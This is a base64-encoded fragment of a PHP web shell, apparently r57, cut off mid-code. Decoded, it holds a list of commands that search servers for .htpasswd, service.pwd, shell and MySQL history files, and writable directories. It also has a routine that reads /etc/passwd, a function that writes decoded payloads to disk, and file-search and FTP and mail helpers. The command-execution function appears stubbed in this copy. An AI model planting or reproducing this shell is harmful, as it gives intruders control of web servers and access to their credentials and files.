VycmVudCBkaXInPT4nZmluZCAuIC10eXBlIGYgLW5hbWUgY29uZmlnLmluYy5waHAnLCdmaW5kIGNvbmZpZyogZmlsZXMnPT4nZmluZCAvIC10eXBlIGYgLW5hbWUgImNvbmZpZyoiJywnZmluZCBjb25maWcqIGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1uYW1lICJjb25maWcqIicsJ2ZpbmQgYWxsIHdyaXRhYmxlIGZpbGVzJz0+J2ZpbmQgLyAtdHlwZSBmIC1wZXJtIC0yIC1scycsJ2ZpbmQgYWxsIHdyaXRhYmxlIGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1wZXJtIC0yIC1scycsJ2ZpbmQgYWxsIHdyaXRhYmxlIGRpcmVjdG9yaWVzJz0+J2ZpbmQgLyAgLXR5cGUgZCAtcGVybSAtMiAtbHMnLCdmaW5kIGFsbCB3cml0YWJsZSBkaXJlY3RvcmllcyBpbiBjdXJyZW50IGRpcic9PidmaW5kIC4gLXR5cGUgZCAtcGVybSAtMiAtbHMnLCdmaW5kIGFsbCB3cml0YWJsZSBkaXJlY3RvcmllcyBhbmQgZmlsZXMnPT4nZmluZCAvIC1wZXJtIC0yIC1scycsJ2ZpbmQgYWxsIHdyaXRhYmxlIGRpcmVjdG9yaWVzIGFuZCBmaWxlcyBpbiBjdXJyZW50IGRpcic9PidmaW5kIC4gLXBlcm0gLTIgLWxzJywnZmluZCBhbGwgc2VydmljZS5wd2QgZmlsZXMnPT4nZmluZCAvIC10eXBlIGYgLW5hbWUgc2VydmljZS5wd2QnLCdmaW5kIHNlcnZpY2UucHdkIGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1uYW1lIHNlcnZpY2UucHdkJywnZmluZCBhbGwgLmh0cGFzc3dkIGZpbGVzJz0+J2ZpbmQgLyAtdHlwZSBmIC1uYW1lIC5odHBhc3N3ZCcsJ2ZpbmQgLmh0cGFzc3dkIGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1uYW1lIC5odHBhc3N3ZCcsJ2ZpbmQgYWxsIC5iYXNoX2hpc3RvcnkgZmlsZXMnPT4nZmluZCAvIC10eXBlIGYgLW5hbWUgLmJhc2hfaGlzdG9yeScsJ2ZpbmQgLmJhc2hfaGlzdG9yeSBmaWxlcyBpbiBjdXJyZW50IGRpcic9PidmaW5kIC4gLXR5cGUgZiAtbmFtZSAuYmFzaF9oaXN0b3J5JywnZmluZCBhbGwgLm15c3FsX2hpc3RvcnkgZmlsZXMnPT4nZmluZCAvIC10eXBlIGYgLW5hbWUgLm15c3FsX2hpc3RvcnknLCdmaW5kIC5teXNxbF9oaXN0b3J5IGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1uYW1lIC5teXNxbF9oaXN0b3J5JywnZmluZCBhbGwgLmZldGNobWFpbHJjIGZpbGVzJz0+J2ZpbmQgLyAtdHlwZSBmIC1uYW1lIC5mZXRjaG1haWxyYycsJ2ZpbmQgLmZldGNobWFpbHJjIGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1uYW1lIC5mZXRjaG1haWxyYycsJ2xpc3QgZmlsZSBhdHRyaWJ1dGVzIG9uIGEgTGludXggc2Vjb25kIGV4dGVuZGVkIGZpbGUgc3lzdGVtJz0+J2xzYXR0ciAtdmEnLCdzaG93IG9wZW5lZCBwb3J0cyc9PiduZXRzdGF0IC1hbiB8IGdyZXAgLWkgbGlzdGVuJywnLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSc9PidscyAtbGEnKTskdGFibGVfdXAxPSI8dHI+PHRkIGJnY29sb3I9I2NjY2NjYz48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj48ZGl2IGFsaWduPWNlbnRlcj46OiAiOyR0YWJsZV91cDI9IiA6OjwvZGl2PjwvYj48L2ZvbnQ+PC90ZD48L3RyPjx0cj48dGQ+IjskdGFibGVfdXAzPSI8dGFibGUgd2lkdGg9MTAwJSBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTAgYmdjb2xvcj0jMDAwMDAwPjx0cj48dGQgYmdjb2xvcj0jY2NjY2NjPiI7JHRhYmxlX2VuZDE9IjwvdGQ+PC90cj4iOyRhcnJvdz0iICI7JGxiPSI8Zm9udCBjb2xvcj1ibGFjaz5bPC9mb250PiI7JHJiPSI8Zm9udCBjb2xvcj1ibGFjaz5dPC9mb250PiI7JGZvbnQ9Ijxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPiI7JHRzPSI8dGFibGUgY2xhc3M9dGFibGUxIHdpZHRoPTEwMCUgYWxpZ249Y2VudGVyPiI7JHRlPSI8L3RhYmxlPiI7JGZzPSI8Zm9ybSBuYW1lPWZvcm0gbWV0aG9kPVBPU1Q+IjskZmU9IjwvZm9ybT4iO2lmKGlzc2V0KCRfR0VUWyd1c2VycyddKSl7aWYoISR1c2Vycz1zaGVsbF9nZXRfdXNlcnMoKSl7ZWNobyAiPGNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1yZWQ+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0OTYnXS4iPC9mb250PjwvY2VudGVyPiI7fWVsc2Uge2VjaG8gJzxjZW50ZXI+Jztmb3JlYWNoKCR1c2VycyBhcyAkdXNlcil7ZWNobyAkdXNlci4iPGJyPiI7fWVjaG8gJzwvY2VudGVyPic7fWVjaG8gIjxicj48ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj5bIDxhIGhyZWY9Ii4kX1NFUlZFUlsnUEhQX1NFTEYnXS4iPkJBQ0s8L2E+IF08L2I+PC9mb250PjwvZGl2PiI7ZGllKCk7fWlmKCFlbXB0eSgkX1BPU1RbJ2RpciddKSl7QGNoZGlyKCRfUE9TVFsnZGlyJ10pO30kZGlyPUBnZXRjd2QoKTskd2luZG93cz0wIDskdW5peD0wIDtpZihzdHJsZW4oJGRpcik+MSAgJiYgJGRpclsxIF09PSI6Iikkd2luZG93cz0xIDtlbHNlICR1bml4PTEgO2lmKGVtcHR5KCRkaXIpKXskb3M9Z2V0ZW52KCdPUycpO2lmKGVtcHR5KCRvcykpeyRvcz1waHBfdW5hbWUoKTt9aWYoZW1wdHkoJG9zKSl7JG9zPSItIjskdW5peD0xIDt9ZWxzZSB7aWYoQGVyZWdpKCJed2luIiwkb3MpKXskd2luZG93cz0xIDt9ZWxzZSB7JHVuaXg9MSA7fX19aWYoIWVtcHR5KCRfUE9TVFsnc19kaXInXSkgJiYgIWVtcHR5KCRfUE9TVFsnc190ZXh0J10pICYmICFlbXB0eSgkX1BPU1RbJ2NtZCddKSAmJiAkX1BPU1RbJ2NtZCddPT0ic2VhcmNoX3RleHQiKXtlY2hvICRoZWFkO2lmKCFlbXB0eSgkX1BPU1RbJ3NfbWFzayddKSAmJiAhZW1wdHkoJF9QT1NUWydtJ10pKXskc3I9bmV3IFNlYXJjaFJlc3VsdCgkX1BPU1RbJ3NfZGlyJ10sJF9QT1NUWydzX3RleHQnXSwkX1BPU1RbJ3NfbWFzayddKTt9ZWxzZSB7JHNyPW5ldyBTZWFyY2hSZXN1bHQoJF9QT1NUWydzX2RpciddLCRfUE9TVFsnc190ZXh0J10pO30kc3ItPlNlYXJjaFRleHQoMCAsMCApOyRyZXM9JHNyLT5HZXRSZXN1bHRGaWxlcygpOyRmb3VuZD0kc3ItPkdldE1hdGNoZXNDb3VudCgpOyR0aXRsZXM9JHNyLT5HZXRUaXRsZXMoKTskcj0iIjtpZigkZm91bmQ+MCApeyRyLj0iPFRBQkxFIHdpZHRoPTEwMCU+Ijtmb3JlYWNoKCRyZXMgYXMgJGZpbGU9PiR2KXskci49IjxUUj4iOyRyLj0iPFREIGNvbHNwYW49Mj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj4iLndzKDMgKTskci49KCR3aW5kb3dzKT9zdHJfcmVwbGFjZSgiLyIsIlxcIiwkZmlsZSk6JGZpbGU7JHIuPSI8L2I+PC9mb250PjwvIFREPiI7JHIuPSI8L1RSPiI7Zm9yZWFjaCgkdiBhcyAkYT0+JGIpeyRyLj0iPFRSPiI7JHIuPSI8VEQgYWxpZ249Y2VudGVyPjxCPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPiIuJGEuIjwvZm9udD48L0I+PC9URD4iOyRyLj0iPFREPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPiIud3MoMiApLiRiLiI8L2ZvbnQ+PC9URD4iOyRyLj0iPC9UUj5cbiI7fX0kci49IjwvVEFCTEU+IjtlY2hvICRyO31lbHNlIHtlY2hvICI8UCBhbGlnbj1jZW50ZXI+PEI+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NTYnXS4iPC9CPjwvZm9udD48L1A+Ijt9ZWNobyAiPGJyPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPlsgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI+QkFDSzwvYT4gXTwvYj48L2ZvbnQ+PC9kaXY+IjtkaWUoKTt9aWYoc3RycG9zKGV4KCJlY2hvIGFiY3I1NyIpLCJyNTciKSE9MyApeyRzYWZlX21vZGU9MSA7fSRTRVJWRVJfU09GVFdBUkU9Z2V0ZW52KCdTRVJWRVJfU09GVFdBUkUnKTtpZihlbXB0eSgkU0VSVkVSX1NPRlRXQVJFKSl7JFNFUlZFUl9TT0ZUV0FSRT0iLSI7fWZ1bmN0aW9uIHdzKCRpKXtyZXR1cm4gQHN0cl9yZXBlYXQoIiZuYnNwOyIsJGkpO31mdW5jdGlvbiBleCgkY2ZlKXskcmVzPScnO2lmKCFlbXB0eSgkY2ZlKSl7fXJldHVybiAkcmVzO31mdW5jdGlvbiBzaGVsbF9nZXRfdXNlcnMoKXskdXNlcnM9YXJyYXkoKTskcm93cz1maWxlKCcvZXRjL3Bhc3N3ZCcpO2lmKCEkcm93cylyZXR1cm4gMCA7Zm9yZWFjaCgkcm93cyBhcyAkc3RyaW5nKXskdXNlcj1AZXhwbG9kZSgiOiIsJHN0cmluZyk7aWYoc3Vic3RyKCRzdHJpbmcsMCAsMSApIT0nIycpYXJyYXlfcHVzaCgkdXNlcnMsJHVzZXJbMCBdKTt9cmV0dXJuICR1c2Vyczt9ZnVuY3Rpb24gd2UoJGkpe2lmKCRHTE9CQUxTWydsYW5ndWFnZSddPT0icnUiKXskdGV4dD0nzvjo4ergISDN5SDs7uPzIOfg7+jx4PL8IOIg9ODp6yAnO31lbHNlIHskdGV4dD0iWy1dIEVSUk9SISBDYW4ndCB3cml0ZSBpbiBmaWxlICI7fWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI+PHRkIGJnY29sb3I9I2NjY2NjYz48Zm9udCBjb2xvcj1yZWQgZmFjZT1WZXJkYW5hIHNpemU9LTI+PGRpdiBhbGlnbj1jZW50ZXI+PGI+Ii4kdGV4dC4kaS4iPC9iPjwvZGl2PjwvZm9udD48L3RkPjwvdHI+PC90YWJsZT4iO3JldHVybiBudWxsO31mdW5jdGlvbiByZSgkaSl7aWYoJEdMT0JBTFNbJ2xhbmd1YWdlJ109PSJydSIpeyR0ZXh0PSfO+Ojh6uAhIM3lIOzu4/Mg7/Du9+jy4PL8IPTg6esgJzt9ZWxzZSB7JHRleHQ9IlstXSBFUlJPUiEgQ2FuJ3QgcmVhZCBmaWxlICI7fWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCBiZ2NvbG9yPSMwMDAwMDA+PHRyPjx0ZCBiZ2NvbG9yPSNjY2NjY2M+PGZvbnQgY29sb3I9cmVkIGZhY2U9VmVyZGFuYSBzaXplPS0yPjxkaXYgYWxpZ249Y2VudGVyPjxiPiIuJHRleHQuJGkuIjwvYj48L2Rpdj48L2ZvbnQ+PC90ZD48L3RyPjwvdGFibGU+IjtyZXR1cm4gbnVsbDt9ZnVuY3Rpb24gY2UoJGkpe2lmKCRHTE9CQUxTWydsYW5ndWFnZSddPT0icnUiKXskdGV4dD0izeUg8+Tg6+7x/CDx7ufk4PL8ICI7fWVsc2UgeyR0ZXh0PSJDYW4ndCBjcmVhdGUgIjt9ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIGJnY29sb3I9IzAwMDAwMD48dHI+PHRkIGJnY29sb3I9I2NjY2NjYz48Zm9udCBjb2xvcj1yZWQgZmFjZT1WZXJkYW5hIHNpemU9LTI+PGRpdiBhbGlnbj1jZW50ZXI+PGI+Ii4kdGV4dC4kaS4iPC9iPjwvZGl2PjwvZm9udD48L3RkPjwvdHI+PC90YWJsZT4iO3JldHVybiBudWxsO31mdW5jdGlvbiBmZSgkbCwkbil7JHRleHRbJ3J1J109YXJyYXkoJ83lIPPk4Ovu8fwg7+7k6uv+9+jy/PH/IOogZnRwIPHl8OLl8PMnLCfO+Ojh6uAg4OLy7vDo5+D26Ogg7eAgZnRwIPHl8OLl8OUnLCfN5SDz5ODr7vH8IO/u7OXt//L8IOTo8OXq8u7w6P4g7eAgZnRwIPHl8OLl8OUnKTskdGV4dFsnZW5nJ109YXJyYXkoJ0Nvbm5lY3QgdG8gZnRwIHNlcnZlciBmYWlsZWQnLCdMb2dpbiB0byBmdHAgc2VydmVyIGZhaWxlZCcsJ0NhblwndCBjaGFuZ2UgZGlyIG9uIGZ0cCBzZXJ2ZXInKTtlY2hvICI8dGFibGUgd2lkdGg9MTAwJSBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTAgYmdjb2xvcj0jMDAwMDAwPjx0cj48dGQgYmdjb2xvcj0jY2NjY2NjPjxmb250IGNvbG9yPXJlZCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48ZGl2IGFsaWduPWNlbnRlcj48Yj4iLiR0ZXh0WyRsXVskbl0uIjwvYj48L2Rpdj48L2ZvbnQ+PC90ZD48L3RyPjwvdGFibGU+IjtyZXR1cm4gbnVsbDt9ZnVuY3Rpb24gbXIoJGwsJG4peyR0ZXh0WydydSddPWFycmF5KCfN5SDz5ODr7vH8IO7y7/Dg4ujy/CDv6PH87O4nLCfP6PH87O4g7vLv8ODi6+Xt7icpOyR0ZXh0WydlbmcnXT1hcnJheSgnQ2FuXCd0IHNlbmQgbWFpbCcsJ01haWwgc2VudCcpO2VjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCBiZ2NvbG9yPSMwMDAwMDA+PHRyPjx0ZCBiZ2NvbG9yPSNjY2NjY2M+PGZvbnQgY29sb3I9cmVkIGZhY2U9VmVyZGFuYSBzaXplPS0yPjxkaXYgYWxpZ249Y2VudGVyPjxiPiIuJHRleHRbJGxdWyRuXS4iPC9iPjwvZGl2PjwvZm9udD48L3RkPjwvdHI+PC90YWJsZT4iO3JldHVybiBudWxsO31mdW5jdGlvbiBwZXJtcygkbW9kZSl7aWYoJEdMT0JBTFNbJ3dpbmRvd3MnXSlyZXR1cm4gMCA7aWYoJG1vZGUmMHgxMDAwICl7JHR5cGU9J3AnO31lbHNlIGlmKCRtb2RlJjB4MjAwMCApeyR0eXBlPSdjJzt9ZWxzZSBpZigkbW9kZSYweDQwMDAgKXskdHlwZT0nZCc7fWVsc2UgaWYoJG1vZGUmMHg2MDAwICl7JHR5cGU9J2InO31lbHNlIGlmKCRtb2RlJjB4ODAwMCApeyR0eXBlPSctJzt9ZWxzZSBpZigkbW9kZSYweGEwMDAgKXskdHlwZT0nbCc7fWVsc2UgaWYoJG1vZGUmMHhjMDAwICl7JHR5cGU9J3MnO31lbHNlICR0eXBlPSd1Jzskb3duZXJbInJlYWQiXT0oJG1vZGUmMDA0MDAgKT8ncic6Jy0nOyRvd25lclsid3JpdGUiXT0oJG1vZGUmMDAyMDAgKT8ndyc6Jy0nOyRvd25lclsiZXhlY3V0ZSJdPSgkbW9kZSYwMDEwMCApPyd4JzonLSc7JGdyb3VwWyJyZWFkIl09KCRtb2RlJjAwMDQwICk/J3InOictJzskZ3JvdXBbIndyaXRlIl09KCRtb2RlJjAwMDIwICk/J3cnOictJzskZ3JvdXBbImV4ZWN1dGUiXT0oJG1vZGUmMDAwMTAgKT8neCc6Jy0nOyR3b3JsZFsicmVhZCJdPSgkbW9kZSYwMDAwNCApPydyJzonLSc7JHdvcmxkWyJ3cml0ZSJdPSgkbW9kZSYwMDAwMiApPyd3JzonLSc7JHdvcmxkWyJleGVjdXRlIl09KCRtb2RlJjAwMDAxICk/J3gnOictJztpZigkbW9kZSYweDgwMCApJG93bmVyWyJleGVjdXRlIl09KCRvd25lclsnZXhlY3V0ZSddPT0neCcpPydzJzonUyc7aWYoJG1vZGUmMHg0MDAgKSRncm91cFsiZXhlY3V0ZSJdPSgkZ3JvdXBbJ2V4ZWN1dGUnXT09J3gnKT8ncyc6J1MnO2lmKCRtb2RlJjB4MjAwICkkd29ybGRbImV4ZWN1dGUiXT0oJHdvcmxkWydleGVjdXRlJ109PSd4Jyk/J3QnOidUJzskcz1zcHJpbnRmKCIlMXMiLCR0eXBlKTskcy49c3ByaW50ZigiJTFzJTFzJTFzIiwkb3duZXJbJ3JlYWQnXSwkb3duZXJbJ3dyaXRlJ10sJG93bmVyWydleGVjdXRlJ10pOyRzLj1zcHJpbnRmKCIlMXMlMXMlMXMiLCRncm91cFsncmVhZCddLCRncm91cFsnd3JpdGUnXSwkZ3JvdXBbJ2V4ZWN1dGUnXSk7JHMuPXNwcmludGYoIiUxcyUxcyUxcyIsJHdvcmxkWydyZWFkJ10sJHdvcmxkWyd3cml0ZSddLCR3b3JsZFsnZXhlY3V0ZSddKTtyZXR1cm4gdHJpbSgkcyk7fWZ1bmN0aW9uIGluKCR0eXBlLCRuYW1lLCRzaXplLCR2YWx1ZSl7JHJldD0iPGlucHV0IHR5cGU9Ii4kdHlwZS4iIG5hbWU9Ii4kbmFtZS4iICI7aWYoJHNpemUhPTAgKXskcmV0Lj0ic2l6ZT0iLiRzaXplLiIgIjt9JHJldC49InZhbHVlPVwiIi4kdmFsdWUuIlwiPiI7cmV0dXJuICRyZXQ7fWZ1bmN0aW9uIHdoaWNoKCRwcil7JHBhdGg9ZXgoIndoaWNoICRwciIpO2lmKCFlbXB0eSgkcGF0aCkpe3JldHVybiAkcGF0aDt9ZWxzZSB7cmV0dXJuICRwcjt9fWZ1bmN0aW9uIGNmKCRmbmFtZSwkdGV4dCl7JHdfZmlsZT1AZm9wZW4oJGZuYW1lLCJ3Iikgb3Igd2UoJGZuYW1lKTtpZigkd19maWxlKXtAZnB1dHMoJHdfZmlsZSxAYmFzZTY0X2RlY29kZSgkdGV4dCkpO0BmY2xvc2UoJHdfZmlsZSk7fX1mdW5jdGlvbiBzcigkbCwkdDEsJHQyKXtyZXR1cm4gIjx0ciBjbGFzcz10cjE+PHRkIGNsYXNzPXRkMSB3aWR0aD0iLiRsLiIlIGFsaWduPXJpZ2h0PiIuJHQxLiI8L3RkPjx0ZCBjbGFzcz10ZDEgYWxpZ249bGVmdD4iLiR0Mi4iPC90ZD48L3RyPiI7fWlmKCFAZnVuY3Rpb25fZXhpc3RzKCJ2aWV3X3NpemUiKSl7ZnVuY3Rpb24gdmlld19zaXplKCRzaXplKXtpZigkc2l6ZT49MTA3Mzc0MTgyNCApeyRzaXplPUByb3VuZCgkc2l6ZS8xMDczNzQxODI0ICoxMDAgKS8xMDAgLiIgR0IiO31lbHNlaWYoJHNpemU+PTEwNDg1NzYgKXskc2l6ZT1Acm91bmQoJHNpemUvMTA0ODU3NiAqMTAwICkvMTAwIC4iIE1CIjt9ZWxzZWlmKCRzaXplPj0xMDI0ICl7JHNpemU9QHJvdW5kKCRzaXplLzEwMjQgKjEwMCApLzEwMCAuIiBLQiI7fWVsc2UgeyRzaXplPSRzaXplLiIgQiI7fXJldHVybiAkc2l6ZTt9fWZ1bmN0aW9uIERpckZpbGVzKCRkaXIsJHR5cGVzPScnKXskZmlsZXM9YXJyYXkoKTtpZigoJGhhbmRsZT1Ab3BlbmRpcigkZGlyKSkpe3doaWxlKEZBTFNFIT09KCRmaWxlPUByZWFkZGlyKCRoYW5kbGUpKSl7aWYoJGZpbGUhPSIuIiAmJiAkZmlsZSE9Ii4uIil7aWYoIWlzX2RpcigkZGlyLiIvIi4kZmlsZSkpe2lmKCR0eXBlcyl7JHBvcz1Ac3RycnBvcygkZmlsZSwiLiIpOyRleHQ9QHN1YnN0cigkZmlsZSwkcG9zLEBzdHJsZW4oJGZpbGUpLSRwb3MpO2lmKEBpbl9hcnJheSgkZXh0LEBleHBsb2RlKCc7JywkdHlwZXMpKSkkZmlsZXNbXT0kZGlyLiIvIi4kZmlsZTt9ZWxzZSAkZmlsZXNbXT0kZGlyLiIvIi4kZmlsZTt9fX1AY2xvc2VkaXIoJGhhbmRsZSk7fXJldHVybiAkZmlsZXM7fWZ1bmN0aW9uIERpckZpbGVzV2lkZSgkZGlyKXskZmlsZXM9YXJyYXkoKTskZGlycz1hcnJheSgpO2lmKCgkaGFuZGxlPUBvcGVuZGlyKCRkaXIpKSl7d2hpbGUoZmFsc2UhPT0oJGZpbGU9QHJlYWRkaXIoJGhhbmRsZSkpKXtpZigkZmlsZSE9Ii4iICYmICRmaWxlIT0iLi4iKXtpZihAaXNfZGlyKCRkaXIuIi8iLiRmaWxlKSl7JGZpbGU9QHN0cnRvdXBwZXIoJGZpbGUpOyRkaXJzWyRmaWxlXT0nJmx0O0RJUiZndDsnO31lbHNlICRmaWxlc1skZmlsZV09QGZpbGVzaXplKCRkaXIuIi8iLiRmaWxlKTt9fUBjbG9zZWRpcigkaGFuZGxlKTtAa3NvcnQoJGRpcnMpO0Brc29ydCgkZmlsZXMpOyRmaWxlcz1AYXJyYXlfbWVyZ2UoJGRpcnMsJGZpbGVzKTt9cmV0dXJuICRmaWxlczt9ZnVuY3Rpb24gRGlyRmlsZXNSKCRkaXIsJHR5cGVzPScnKXskZmlsZXM9YXJyYXkoKTtpZigoJGhhbmRsZT1Ab3BlbmRpcigkZGlyKSkpe3doaWxlKGZhbHNlIT09KCRmaWxlPUByZWFkZGlyKCRoYW5kbGUpKSl7aWYoJGZpbGUhPSIuIiAmJiAkZmlsZSE9Ii4uIil7aWYoQGlzX2RpcigkZGlyLiIvIi4kZmlsZSkpJGZpbGVzPUBhcnJheV9tZXJnZSgkZmlsZXMsRGlyRmlsZXNSKCRkaXIuIi8iLiRmaWxlLCR0eXBlcykpO2Vsc2UgeyRwb3M9QHN0cnJwb3MoJGZpbGUsIi4iKTskZXh0PUBzdWJzdHIoJGZpbGUsJHBvcyxAc3RybGVuKCRmaWxlKS0kcG9zKTtpZigkdHlwZXMpe2lmKEBpbl9hcnJheSgkZXh0LGV4cGxvZGUoJzsnLCR0eXBlcykpKSRmaWxlc1tdPSRkaXIuIi8iLiRmaWxlO31lbHNlICRmaWxlc1tdPSRkaXIuIi8iLiRmaWxlO319fUBjbG9zZWRpcigkaGFuZGxlKTt9cmV0dXJuICRmaWxlczt9ZnVuY3Rpb24gRGlyUHJpbnRIVE1MSGVhZGVycygkZGlyKXskcG9ja2V0cz0nJzskaGFuZGxlPUBvcGVuZGlyKCRkaXIpIG9yIGRpZSgiQ2FuJ3Qgb3BlbiBkaXJlY3RvcnkgJGRpciIpO2VjaG8gIiAgICA8dWwgc3R5bGU9J21hcmdpbi1sZWZ0OiAwcHg7IHBhZGRpbmctbGVmdDogMjBweDsnPlxuIjt3aGlsZShmYWxzZSE9PSgkZmlsZT1AcmVhZGRpcigkaGFuZGxlKSkpe2lmKCRmaWxlIT0iLiIgJiYgJGZpbGUhPSIuLiIpe2lmKEBpc19kaXIoJGRpci4iLyIuJGZpbGUpKXtlY2hvICIgICAgICA8bGk+PGI+WyAkZmlsZSBdPC9iPjwvbGk+XG4iO0RpclByaW50SFRNTEhlYWRlcnMoJGRpci4iLyIuJGZpbGUpO31lbHNlIHskcG9zPUBzdHJycG9zKCRmaWxlLCIuIik7JGV4dD1Ac3Vic3RyKCRmaWxlLCRwb3MsQHN0cmxlbigkZmlsZSktJHBvcyk7aWYoQGluX2FycmF5KCRleHQsYXJyYXkoJy5odG0nLCcuaHRtbCcpKSl7JGhlYWRlcj0nLT1Ob25lPS0nOyRzdHJpbmdzPUBmaWxlKCRkaXIuIi8iLiRmaWxlKSBvciBkaWUoIkNhbid0IG9wZW4gZmlsZSAiLiRkaXIuIi8iLiRmaWxlKTtmb3IoJGE9MCA7JGE8Y291bnQoJHN0cmluZ3MpOyRhKyspeyRwYXR0ZXJuPScoPHRpdGxlPiguKyk8L3RpdGxlPiknO2lmKEBlcmVnaSgkcGF0dGVybiwkc3RyaW5nc1skYV0sJHBvY2tldHMpKXskaGVhZGVyPSImbGFxdW87Ii4kcG9ja2V0c1syIF0uIiZyYXF1bzsiO2JyZWFrO319ZWNobyAiICAgICAgPGxpPiIuJGhlYWRlci4iPC9saT5cbiI7fX19fWVjaG8gIiAgICA8L3VsPlxuIjtAY2xvc2VkaXIoJGhhbmRsZSk7fWNsYXNzIFNlYXJjaFJlc3VsdHt2YXIgJHRleHQ7dmFyICRGaWxlc1RvU2VhcmNoO3ZhciAkUmVzdWx0RmlsZXM7dmFyICRGaWxlc1RvdGFsO3ZhciAkTWF0Y2hlc0NvdW50O3ZhciAkRmlsZU1hdHNjaGVzQ291bnQ7dmFyICRUaW1lU3RhcnQ7dmFyICRUaW1lVG90YWw7dmFyICR0aXRsZXM7ZnVuY3Rpb24gU2VhcmNoUmVzdWx0KCRkaXIsJHRleHQsJGZpbHRlcj0nJyl7JGRpcnM9QGV4cGxvZGUoIjsiLCRkaXIpOyR0aGlzLT5GaWxlc1RvU2VhcmNoPWFycmF5KCk7Zm9yKCRhPTAgOyRhPGNvdW50KCRkaXJzKTskYSsrKSR0aGlzLT5GaWxlc1RvU2VhcmNoPUBhcnJheV9tZXJnZSgkdGhpcy0+RmlsZXNUb1NlYXJjaCxEaXJGaWxlc1IoJGRpcnNbJGFdLCRmaWx0ZXIpKTskdGhpcy0+dGV4dD0kdGV4dDskdGhpcy0+RmlsZXNUb3RhbD1AY291bnQoJHRoaXMtPkZpbGVzVG9TZWFyY2gpOyR0aGlzLT5UaW1lU3RhcnQ9Z2V0bWljcm90aW1lKCk7JHRoaXMtPk1hdGNoZXNDb3VudD0wIDskdGhpcy0+UmVzdWx0RmlsZXM9YXJyYXkoKTskdGhpcy0+RmlsZU1hdGNoZXNDb3VudD1hcnJheSgpOyR0aGlzLT50aXRsZXM9YXJyYXkoKTt9ZnVuY3Rpb24gR2V0RmlsZXNUb3RhbCgpe3JldHVybiAkdGhpcy0+RmlsZXNUb3RhbDt9ZnVuY3Rpb24gR2V0VGl0bGVzKCl7cmV0dXJuICR0aGlzLT50aXRsZXM7fWZ1bmN0aW9uIEdldFRpbWVUb3RhbCgpe3JldHVybiAkdGhpcy0+VGltZVRvdGFsO31mdW5jdGlvbiBHZXRNYXRjaGVzQ291bnQoKXtyZXR1cm4gJHRoaXMtPk1hdGNoZXNDb3VudDt9ZnVuY3Rpb24gR2V0RmlsZU1hdGNoZXNDb3VudCgpe3JldHVybiAkdGhpcy0+RmlsZU1hdGNoZXNDb3VudDt9ZnVuY3Rpb24gR2V0UmVzdWx0RmlsZXMoKXtyZXR1cm4gJHRoaXMtPlJlc3VsdEZpbGVzO31mdW5jdGlvbiBTZWFyY2hUZXh0KCRwaHJhc2U9MCAsJGNhc2U9MCApeyRxcT1AZXhwbG9kZSgnICcsJHRoaXMtPnRleHQpOyRkZWxpbT0nfCc7aWYoJHBocmFzZSlmb3JlYWNoKCRxcSBhcyAkaz0+JHYpJHFxWyRrXT0nXGInLiR2LidcYic7JHdvcmRzPScoJy5AaW1wbG9kZSgkZGVsaW0sJHFxKS4nKSc7JHBhdHRlcm49Ii8iLiR3b3Jkcy4iLyI7aWYoISRjYXNlKSRwYXR0ZXJuLj0naSc7Zm9yZWFjaCgkdGhpcy0+RmlsZXNUb1NlYXJjaCBhcyAkaz0+JGZpbGVuYW1lKXskdGhpcy0+RmlsZU1hdGNoZXNDb3VudFskZmlsZW5hbWVdPTAgOyRGaWxlU3RyaW5ncz1AZmlsZSgkZmlsZW5hbWUpIG9yIEBuZXh0O2ZvcigkYT0wIDskYTxAY291bnQoJEZpbGVTdHJpbmdzKTskYSsrKXskY291bnQ9MCA7JEN1clN0cmluZz0kRmlsZVN0cmluZ3NbJGFdOyRDdXJTdHJpbmc9QFRyaW0oJEN1clN0cmluZyk7JEN1clN0cmluZz1Ac3RyaXBfdGFncygkQ3VyU3RyaW5nKTskYWE9Jyc7aWYoKCRjb3VudD1AcHJlZ19tYXRjaF9hbGwoJHBhdHRlcm4sJEN1clN0cmluZywkYWEpKSl7JEN1clN0cmluZz1AcHJlZ19yZXBsYWNlKCRwYXR0ZXJuLCI8U1BBTiBzdHlsZT0nY29sb3I6ICM5OTAwMDA7Jz48Yj5cXDE8L2